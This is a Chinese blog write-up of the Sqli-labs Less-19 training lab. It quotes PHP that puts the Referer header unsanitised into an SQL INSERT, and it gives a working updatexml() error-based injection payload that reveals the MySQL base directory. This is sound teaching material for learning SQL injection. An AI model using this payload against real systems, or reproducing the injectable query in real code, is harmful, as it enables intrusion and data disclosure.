Sqli-labs Less-19 Referer注入 updatexml()报错注入
从源代码中我们可以看到我们获取到的是HTTP_REFERER
1 2 3 4 | $uagent = $_SERVER [ 'HTTP_REFERER' ]; $insert = "INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')" ; echo 'Your Referer is: ' . $uagent ; print_r(mysql_error()); |
那和less18是基本一致的,我们从referer进行修改。
还是像less18一样,我们只给出一个示例
将referer修改为
1' and updatexml(1,concat(0x7e,(select @@basedir),0x7e),1) and '1'='1
可以看到mysql的路径了。
请发散思维思考其他的呦。
参考:https://www.cnblogs.com/lcamry/p/5763029.html
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步